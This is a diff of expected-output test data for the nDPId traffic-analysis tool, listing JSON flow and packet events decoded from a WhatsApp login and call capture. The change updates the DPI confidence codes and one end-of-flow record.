00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1432582296339,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296339,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa4JwAAEARYw3AqAIEHw1UMM46DZYAhgQrAAMAaiESpEIAAPM63M4iUJ72Oh1AAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1432582296389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582296389,"pkt":"APS5Jrv0xiwDYGpkCABFAABItbcAAFYRcAQfDV0wwKgCBA2WzjoANObxAQMAGCESpEIAABQXleBLNAVxhWEAIAAIAAG2aW4xsYdAAgAIAAABTYyPEzk="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":889,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1432582296441,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582296441,"pkt":"APS5Jrv0xiwDYGpkCABFAABIu\/4AAFIRdr0fDVQwwKgCBA2WzjoANKRaAQMAGCESpEIAAPM63M4iUJ72Oh0AIAAIAAG2aW4xsYdAAgAIAAABTYyPE2E="} @@ -248,10 +248,10 @@ 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1432582296565,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582296565,"pkt":"APS5Jrv0xiwDYGpkCABFAABID4sAAFMRJqEfDU\/AwKgCBA2WzjoANNk2AQMAGCESpEIAAL9\/1m08YXkuT0YAIAAIAAG2aW4xsYdAAgAIAAABTYyPE58="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":944,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582303186,"flow_last_seen":1432582303186,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582303186,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":52794,"dst_port":51727,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":944,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1432582303186,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582303186,"pkt":"xiwDYGpkAPS5Jrv0CABFwABI\/ugAAEARW8\/AqAIEAcJav846yg8ANOnpAAEAGCESpEL3EVgs34UDSm8ZSi0ACAAUBo8N2M5l\/vTJutWmGJeHW1ycL5M="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582303186,"flow_last_seen":1432582303186,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582303186,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":52794,"dst_port":51727,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582303186,"flow_last_seen":1432582303186,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582303186,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":52794,"dst_port":51727,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":951,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582303300,"flow_last_seen":1432582303300,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582303300,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":52794,"dst_port":9665,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":951,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1432582303300,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582303300,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIibwAAEARIT7AqAIEW\/2wQc46JcEANNm\/AAEAGCESpEJqJ0QlQ7N3HdICmh0ACAAUdy+mbVoXRYBrOj7VSucZjRXX5oc="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":951,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582303300,"flow_last_seen":1432582303300,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582303300,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":52794,"dst_port":9665,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":951,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582303300,"flow_last_seen":1432582303300,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582303300,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":52794,"dst_port":9665,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":964,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1432582303604,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582303604,"pkt":"APS5Jrv0xiwDYGpkCABFAABI2uIAAC8R4ddb\/bBBwKgCBCXBzjoANGAJAAEAGCESpEIU61RZ3ZsVVlL2qyQACAAUqmIWy0WW07d7nJ5APIsHCVUVL7g="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":965,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1432582303607,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582303607,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIbOUAAEARPhXAqAIEW\/2wQc46JcEANIk8AQEAGCESpEIU61RZ3ZsVVlL2qyQACAAU6CFWVCyx0lHi4kItE160ER18SxI="} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":972,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1432582303831,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582303831,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIdWcAAEAR5VDAqAIEAcJav846yg8ANHIiAAEAGCESpEJT9nMzid0wAn5OIFYACAAUj7UY3ZixJKF1uir6vHE5QBib28w="} @@ -266,8 +266,8 @@ 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1432582355253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582355253,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAz7ZAAEAGVELAqAIEEa1CZsA1Abt+ckUjAAAAALAC\/\/9LOwAAAgQFtAEDAwQBAQgKLfwhgQAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1432582355393,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582355393,"pkt":"APS5Jrv0xiwDYGpkCABFAAA009MAAO8G4TARrUJmwKgCBAG7wDWkxiaffnJFJIASH\/7nbQAAAgQFoAEDAwQBAQQC"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1432582355478,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582355478,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoTu9AAEAG1SHAqAIEEa1CZsA1Abt+ckUkpMYmoFAQQAAIJwAA"} -00992{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1220,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582355253,"flow_last_seen":1432582355482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1432582355482,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1222,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582355253,"flow_last_seen":1432582355622,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1432582355622,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00992{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1220,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582355253,"flow_last_seen":1432582355482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1432582355482,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1222,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582355253,"flow_last_seen":1432582355622,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1432582355622,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224235,"flow_last_seen":1432582224264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"5.178.42.26","src_port":49174,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224235,"flow_last_seen":1432582224264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"5.178.42.26","src_port":49174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224210,"flow_last_seen":1432582224240,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.82","src_port":49173,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -280,7 +280,7 @@ 00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223075,"flow_last_seen":1432582223379,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.121","src_port":49166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225329,"flow_last_seen":1432582225381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.130.137.77","src_port":49176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225329,"flow_last_seen":1432582225381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.130.137.77","src_port":49176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582224230,"flow_last_seen":1432582224260,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582224230,"flow_last_seen":1432582224260,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582227884,"flow_last_seen":1432582228167,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582227884,"flow_last_seen":1432582228167,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225324,"flow_last_seen":1432582225533,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.55","src_port":49165,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} @@ -293,58 +293,58 @@ 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582233751,"flow_last_seen":1432582233926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.49","src_port":49191,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224208,"flow_last_seen":1432582224417,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49169,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224208,"flow_last_seen":1432582224417,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49169,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432582271840,"flow_last_seen":1432582331780,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":3000,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1432582222253,"flow_last_seen":1432582223191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":876,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432582271840,"flow_last_seen":1432582331780,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":3000,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1432582222253,"flow_last_seen":1432582223191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":876,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} 